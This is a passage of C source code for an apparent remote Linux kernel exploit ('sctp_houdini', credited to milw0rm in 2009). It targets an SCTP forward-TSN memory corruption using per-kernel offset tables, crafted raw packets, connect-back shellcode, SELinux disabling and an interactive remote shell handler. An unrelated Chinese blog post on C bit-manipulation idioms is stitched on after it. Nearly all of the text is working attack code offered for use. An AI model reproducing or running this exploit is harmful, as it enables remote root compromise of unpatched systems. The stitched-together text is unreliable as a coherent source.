  __u32 vsysjumpsize;

  const char *vsyspatchjump;
  __u32 vsyspatchjumpsize;

  __u32 chunksize;
  __u32 slubsize;
  __u32 ptrsize;

  const char *selinux;

  int allocator_type;

} kinfo;

static kinfo *k;

typedef struct
{
  const char* target;
  const char* rhost;
  const char* lhost;
  __u16 rport;
  __u16 lport;

  __u16 sport; // defines associations
  __u16 nconn;

} hinfo;

static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 };

static kinfo kernels[] = {
    {
      "ubuntu64_faisty-2.6.20-[15-17]-generic",
      "(faisty: generic kernel)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      256,
      8,
      NULL,
      SLAB_ALLOCATOR
    },
    {
      "ubuntu64_faisty-2.6.20-17-server",
      "(faisty: server kernel - last 2.6.20-17 build)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_20_17_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      256,
      8,
      NULL,
      SLAB_ALLOCATOR
    },
    {
      "ubuntu64_hardy-2.6.24-[18-21]-generic",
      "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_hardy_2.6.24-[16-18]-server",
      "(kernel from 2.6.24-16 to 2.6.24-18 -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_hardy-2.6.24-[19-22]-server",
      "(kernel from 2.6.24-19 to 2.6.24-22 -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_hardy-2.6.24-23-last-server",
      "(last 2.6.24-23 kernel before patch -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_intrepid-2.6.27-7-server",
      "(kernel 2.6.27-7 -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_27_7_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_intrepid-2.6.27-[9-last]-server",
      "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "ubuntu64_intrepid-2.6.27-[7-last]-generic",
      "(kernel 2.6.27-9 to the last unpatched kernel -- server)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      NULL,
      SLUB_ALLOCATOR
    },
    {
      "fedora64_10-2.6.25-117",
      "(fedora core 10 default installed kernel)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      fedora64_10_default_kernel_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      96,
      8,
      fedora64_10_default_kernel_x86_64_selinux,
      SLUB_ALLOCATOR
    },
    {
      "opensuse64_11.1-2.6.27.7-9-default",
      "(opensuse 11.1 default installed kernel)",
      generic_x86_64_shellcode,
      sizeof(generic_x86_64_shellcode) -1,
      __OFFSET_PORT_64,
      __OFFSET_HOST_64,
      opensuse64_11_1_default_kernel_x86_64_vsys_shadow,
      generic_x86_64_jump,
      6,
      generic_x86_64_patchjump,
      8,
      40,
      256,
      8,
      NULL,
      SLAB_ALLOCATOR
    }
};

/* modular arithmetic shift */
#define __SHIFT_CHECK 0x7FFF
static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 };
static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 };

/* global streams obj */
static __u16 streams[1000][2];

/* get stream flow */
static int build_stream(const void *data, __u32 size, __u16 fc)
{
  int chunk_num,i,j,stnum=0;
  __u16 *p;
  __u16 *shift;
  if(size % 2)
    __fatal("[!!!] build_stream: data unaligned");

  memset(streams, 0x00, sizeof(streams));

  chunk_num = size / 2;
  p = (__u16*)data;
  for(i=0; i<chunk_num; i++, p++, fc++)
  {
    __u16 val  = *p - 1;
    if(val <= __SHIFT_CHECK)
      shift = shift_0_to_7fff;
    else
      shift = shift_8000_to_ffff; 

    for(j=0; j<3; j++)
    {
      streams[stnum][0] = fc;
      streams[stnum++][1] = shift[j];
    }

    streams[stnum][0] = fc;
    streams[stnum++][1] = val;
  }

  return stnum ? stnum : 0;
}

/* some sctp packet header structs */
struct sctp_hdr
{
  __u16 sport;
  __u16 dport;
  __u32 vtag;
  __u32 checksum;
  char chunks[0];
}__attribute__((packed));

struct sctp_chk
{
  __u8 type;
  __u8 flags;
  __u16 len;
  char data[0];
}__attribute((packed));

struct sctp_chunk_fwd
{
  __u8 type;
  __u8 flags;
  __u16 len;
  __u32 new_tsn;
}__attribute__((packed));

enum
{
  SCTP_INIT_ACK = 2,
  SCTP_SACK = 3,
  SCTP_FWD = 192
};

void disable_abort()
{
  /* lame trick to block  ABORT chunks from reaching the target!
   * ABORT messages are generated because we receive a SACK with an out-of-bound TSN
   * in reply to all fake FWD sent
   * (when this happens local kernel kills the connection)
   */

  system("iptables -t filter -A OUTPUT -p sctp --chunk-types any ABORT -j DROP");
}

#define FWD_MAX_SIZE 0x1000
void *make_fwd_packet(__u16 sp, __u16 dp, __u32 vtag, __u32 tsn,
                      __u16 streams[][2], int streamlen, int *p_len)
{
  int i;
  __u16 *pstream;
  struct sctp_hdr *hdr;
  struct sctp_chunk_fwd *fwd;
  __u8 *__buff = malloc(FWD_MAX_SIZE);
  memset(__buff, 0, FWD_MAX_SIZE);

  hdr = (struct sctp_hdr *)__buff;

  hdr->sport = htons(sp);
  hdr->dport = htons(dp);
  hdr->vtag = htonl(vtag);
  hdr->checksum = 0;
  fwd = (struct sctp_chunk_fwd *)(hdr->chunks);
  fwd->type = SCTP_FWD;
  fwd->flags = 0;
  fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams
  fwd->new_tsn = htonl(tsn+1);

  /* build stream */
  pstream = (__u16 *)((&(fwd->new_tsn)) + 1);
  for(i=0; i<streamlen; i++)
  {
    *pstream++ = streams[i][0];
    *pstream++ = streams[i][1];
  }

  *p_len = ntohs(fwd->len) + sizeof(*hdr);
  hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len)));
  return hdr;
}

/* this function gets VTAG/TSN bound with this socket pair */
int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp,
                      __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2)
{
  char packet[1500];
  int p_len;
  void *end;
  struct sctp_hdr *hdr;
  struct sctp_chk *chk;
  __u32 tmp;
  __u16 psp,pdp;
  fd_set r;
  struct timeval tv;

  int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
  if(raw_fd < 0)
    __fatal_perror("socket: RAW/SCTP");

  FD_ZERO(&r);
  FD_SET(raw_fd, &r);
  tv.tv_usec=0;
  tv.tv_sec=10;

  while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0)
  {
    p_len = read(raw_fd, packet, sizeof(packet));
    end = packet + p_len;
    hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr));
    if((void*)(((char *)hdr)+4)  >= end)
      continue;

    /* check for chunk */
    chk = (struct sctp_chk *)(hdr->chunks);
    tmp  =  ntohl(*((__u32*)(chk->data)));
    psp = ntohs(hdr->sport);
    pdp = ntohs(hdr->dport);

    if(chk->type == SCTP_SACK)
    {
      if(psp == dp && pdp == sp)
        *tsn  =  tmp;

      if(psp == dp && pdp == sp2)
        *tsn2  =  tmp;
    }

    if(chk->type == SCTP_INIT_ACK)
    {
      if(psp == dp && pdp == sp)
        *vtag =  tmp;

      if(psp == dp && pdp == sp2)
        *vtag2 =  tmp;
    }

    if(*vtag && *tsn && *vtag2 && *tsn2)
      break;

    FD_ZERO(&r);
    FD_SET(raw_fd, &r);
    tv.tv_usec=0;
    tv.tv_sec=10;
  } 

  return 0;
}

/* global vars */
static __u16 sport=0;
static __u16 sport2=0;
static __u32 vtag=0, vtag2=0;
static __u32 tsn=0, tsn2=0;

static struct sockaddr_in server_sctp;
int raw_sctp=-1;

#define STACK_SIZE 0x1000
char clone_stack[STACK_SIZE*2];

static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2],
                    int streamlen, __u32 vtag, __u32 tsn)
{
  int p_len=0, ret;
  void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len);
  ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in));
  if(ret < 0)
    __fatal_perror("sendto: sending FWD chunk");

  free(packet);
}

static int clone_thread(void *p)
{
  raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2);
  return 0;
}

static int make_sctp_connection(__u16 sp, __u16 dp, int data)
{
  struct sctp_initmsg msg;
  int ret,o=1,fd;
  socklen_t len_sctp=sizeof(struct sctp_initmsg);
  struct sockaddr_in s,c;

  fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
  if(fd < 0)
    __fatal_perror("socket: sctp SOCK_STREAM");

  ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));
  if (ret < 0)
   __fatal_perror("setsockopt: SO_REUSEADDR");

  /* NOTE: here we assume server peer allocates  10 output streams (as default)
   * if the applciation behaves differently you must probe and change channels size
   * to get the correct slab  */

  if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size
  {
    getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
    msg.sinit_num_ostreams=50; // force 256 slab allocation
    msg.sinit_max_instreams=10;
    setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
  }
  else
  {
    getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
    msg.sinit_num_ostreams=10; // force 96 slab allocation
    msg.sinit_max_instreams=10;
    setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
  }

  if(sp)
  {
    c.sin_family = PF_INET;
    c.sin_port = htons(sp);
    c.sin_addr.s_addr = INADDR_ANY;
    ret = bind(fd, (struct sockaddr *)&c, sizeof(c));
    if(ret < 0)
      __fatal_perror("bind: sctp socket");
  }

  s.sin_family = PF_INET;
  s.sin_port   = htons(dp);
  s.sin_addr.s_addr = inet_addr(h.rhost);

  ret = connect(fd, (struct sockaddr *)&s, sizeof(s));
  if(ret < 0)
    __fatal_perror("connect: sctp socket");

  /* send one byte of data to get correctly
   * TSN from raw socket (from SACK replies)
   */
  if(data)
  {
    ret = send(fd, "", 1, 0);
    if(ret < 0)
      __fatal_perror("send: sctp socket data");
  }
  return fd;
}

static void htons_streams(__u16 s[][2], int len)
{
  int i;
  for(i=0; i<len; i++)
  {
    s[i][0] = htons(s[i][0]);
    s[i][1] = htons(s[i][1]);
  }
}

static void usage()
{
  fprintf(stderr, "./sctp_houdini \n\t"
                  "-H lhost   (local host address for connect back shel)\n\t"
                  "-P lport   (local port address for connect back shell)\n\t"
                  "-h rhost   (remote target host)\n\t"
                  "-p rport   (remote target port)\n\t"
                  "-t kernel  (target kernel)\n\t"
                  "-s sport   (source port defining sctp association where corruption occurs)\n\t"
                  "           (always use higher port if you run the exploit multiple times eg. 20000, 21000, etc..)\n\t"
                  "           (NEVER reuse the same or next port or vsys will be trashed and init will die soon...)\n\t"
                  "-c conn    (number of connectionis before corruption - default 600)\n"
                  );
}

static void sctp_getopt(int argc, char *argv[])
{
  int ret,i;

  while((ret = getopt(argc, argv, "H:P:p:h:t:c:s:")) != -1)
  {
    switch(ret)
    {
      case 'P':
        h.lport = atoi(optarg);
        break;

      case 'p':
        h.rport = atoi(optarg);
        break;

      case 't':
        h.target = optarg;
        break;

      case 'h':
        h.rhost = optarg;
        break;

      case 'H':
        h.lhost = optarg;

      case 'c':
        h.nconn = atoi(optarg);
        break;

      case 's':
        h.sport = atoi(optarg);
        break;
    }
  }

  if(!h.lport || !h.rport || !h.rhost || !h.target || !h.lhost || !h.sport)
  {
    usage();
    exit(1);
  }

  if(h.sport < h.nconn+1)
  {
    fprintf(stderr, "Source Association Port is too low: %d\n", h.sport);
    usage();
    exit(1);
  }

  sport=h.sport;
  sport2=h.sport + 1;

  for(i=0; i < sizeof(kernels)/sizeof(kinfo); i++)
  {
    if(!strcmp(h.target, kernels[i].name))
    {
      k = &kernels[i];
      break;
    }
  }  

  if(k==NULL)
  {
    fprintf(stderr, "Unable to find target: %s\nAvailable targets are:\n", h.target);
    for(i=0; i < sizeof(kernels)/sizeof(kinfo); i++)
    {
      fprintf(stderr, "- %s  %s\n", kernels[i].name, kernels[i].info);
    }
    exit(1);
  }
}

void patchjump()
{
  int ret;

  __msg("[**] Restoring vsys: Emulate gettimeofday()... \n");
  ret = build_stream(k->vsyspatchjump, k->vsyspatchjumpsize, 0);
  if(ret < 0)
    __fatal("Error Building Streams...");

  htons_streams(streams, ret);
  send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); 

}

static void multiplex(int listenfd)
{
  int ret,new_fd;
  fd_set r;
  struct timeval t;
  char buffer[1500];

  FD_ZERO(&r);
  FD_SET(listenfd, &r);
  t.tv_sec = 3;
  t.tv_usec = 0;
  __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n");
  __msg("[**] ..");
  fflush(stdout);

  while(select(listenfd+1, &r, NULL, NULL, &t) == 0)
  {
    printf("..");
    fflush(stdout);
    t.tv_sec = 3;
    t.tv_usec = 0;
    FD_ZERO(&r);
    FD_SET(listenfd, &r);
  }
  __msg("..\n");

  new_fd = accept(listenfd, NULL, 0);
  if(new_fd < 0)
    __fatal_perror("accept: listen fd");

  __msg("[**] Connected!\n");
  patchjump(); 

  close(listenfd);

  write(new_fd, "id\n", 3);

  FD_ZERO(&r);
  FD_SET(new_fd, &r);
  FD_SET(0, &r);
  while(select(new_fd+1, &r, NULL, NULL, NULL) > 0)
  {
    if(FD_ISSET(0, &r)) // read from stdin
    {
      ret = read(0, buffer, sizeof(buffer));
      if(ret < 0)
        __fatal_perror("read: from stdin");
      else
        ret = write(new_fd, buffer, ret);
    }

    if(FD_ISSET(new_fd, &r))
    {
      ret = read(new_fd, buffer, sizeof(buffer));
      if(!ret) {
        __msg("Endopoint closed the connection\n");
        break;
      }
      else if(ret > 0)
      {
        write(1, buffer, ret);
      }
      else
        __fatal_perror("read: from net");
    }

    FD_ZERO(&r);
    FD_SET(new_fd, &r);
    FD_SET(0, &r);
  }

}

/* needed when exploiting old SLAB */
void swap_to_SLAB_chunk()
{
  __u32 tmp;
  __u16 tmp16;

  tmp =  tsn;
  tsn = tsn2;
  tsn2 = tmp;

  tmp = vtag;
  vtag = vtag2;
  vtag2 = tmp;

  tmp16 = sport;
  sport = sport2;
  sport2 = tmp16;
}

int main(int argc, char **argv)
{

  int ret, fd, i, listenfd,o=1;
  struct sockaddr_in l;
  __u32 lh;
  __u16 lp;

  sctp_getopt(argc, argv);

  listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
  if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0)
   __fatal_perror("setsockopt: SO_REUSEADDR");

  l.sin_family = PF_INET;
  l.sin_port = htons(h.lport);
  l.sin_addr.s_addr = inet_addr(h.lhost);
  if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0)
    __fatal_perror("bind: sock");

  if(listen(listenfd, 4) < 0)
    __fatal_perror("listen: sock");

  /* set connect back params */
  lh = inet_addr(h.lhost);
  lp = htons(h.lport);
  memcpy(k->scode + k->portoff, &lp, 2);
  memcpy(k->scode + k->hostoff, &lh, 4);

  raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP);
  if(raw_sctp < 0)
    __fatal_perror("socket: RAW/SCTP montitor socket");

  server_sctp.sin_family = PF_INET;
  server_sctp.sin_port = htons(h.rport);
  server_sctp.sin_addr.s_addr = inet_addr(h.rhost);

  __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n");
  ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL);
  if(ret < 0)
    __fatal_perror("clone");

  sleep(1);

  __msg("[**] Start flushing slub cache...\n");
  for(i=0; i<=h.nconn; i++)
  {
    __u16 p = sport-(h.nconn-1)+i;
    if(p == sport || p== sport2)
      fd = make_sctp_connection(p, h.rport, 1);
    else
      fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0);
//    usleep(10);
  } 

  disable_abort();
  /* wait for monitoring engine */
  wait(NULL);

  if(k->allocator_type == SLAB_ALLOCATOR)
    swap_to_SLAB_chunk();

  if(vtag && tsn && vtag2 && tsn2)
  {
    __u32 acc;

    __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2);
    sleep(1);

    if(k->selinux)
    {
      __msg("[**] Overwriting neightboard sctp map..\n");
      acc = (k->slubsize - k->chunksize) / 2;
      ret = build_stream(k->selinux, k->ptrsize, acc);
      if(ret < 0)
        __fatal("Error Building Streams...");

      htons_streams(streams, ret);
      send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); 

      __msg("[**] Disabling Selinux Enforcing Mode..\n");
      ret = build_stream(__zero, 4, 0);
      if(ret < 0)
        __fatal("Error Building Streams...");

      htons_streams(streams, ret);
      send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2);
    }

    __msg("[**] Overwriting neightboard sctp map ......\n");
    acc = (k->slubsize - k->chunksize) / 2;
    ret = build_stream(k->vsysaddr, k->ptrsize, acc);
    if(ret < 0)
      __fatal("Error Building Streams...");

    htons_streams(streams, ret);
    send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); 

    __msg("[**] Overwriting vsyscall shadow map..\n");
    acc = 0x930 / 2;
    ret = build_stream(k->scode, k->scodesize, acc); //1176
    if(ret < 0)
      __fatal("Error Building Streams...");

    htons_streams(streams, ret);
    send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); 

    __msg("[**] Hijacking vsyscall shadow map..\n");
    ret = build_stream(k->vsysjump, k->vsysjumpsize, 0);
    if(ret < 0)
      __fatal("Error Building Streams...");

    htons_streams(streams, ret);
    send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); 

    sleep(1);
  }
  else
    __fatal("VTAG/TSN not found: network error");

  multiplex(listenfd);
  __msg("[**] Closing Connection... \n");
  return 0;
}

// milw0rm.com [2009-04-28]

参考:
1. http://milw0rm.com/exploits/8556
2. When a "potential D.o.S." means a one-shot remote kernel exploit: the SCTP story
http://kernelbof.blogspot.com/2009/04/kernel-memory-corruptions-are-not-just.html

近来在做驱动方面的开发, 结果发现对位操作反应比较迟钝, 就从网上搜了些有关位操作的说明复习一下.
[sourcecode language='c']
if (set) {
/* shift 位设置为1 */
val |= (1 << shift);
}
else{
/* shift 位清零 */
val &= ~(1 << shift);
}

[/sourcecode]
Set a bit (where n is the bit number, and 0 is the least significant bit):
[sourcecode language='c']
unsigned char a |= (1 << n);
[/sourcecode]
Clear a bit:
[sourcecode language='c']
unsigned char b &= ~(1 << n);
[/sourcecode]
Toggle a bit: n位的值取反
[sourcecode language='c']
unsigned char c ^= (1 << n);
[/sourcecode]
Test a bit:
[sourcecode language='c']
unsigned char e = d & (1 << n); //d has the byte value.
[/sourcecode]
还有一个对奇偶性进行判断
[sourcecode language='c']
a&1 = 0 // 偶数
a&1 = 1 // 奇数
[/sourcecode]
参考:
1.  http://en.wikipedia.org/wiki/Bit_manipulation

2. 这里面将的比较全也比较详细, 有兴趣的可以看看 http://graphics.stanford.edu/~seander/bithacks.html

–
Bian Jiang
Blog:  http://www.wifihack.net/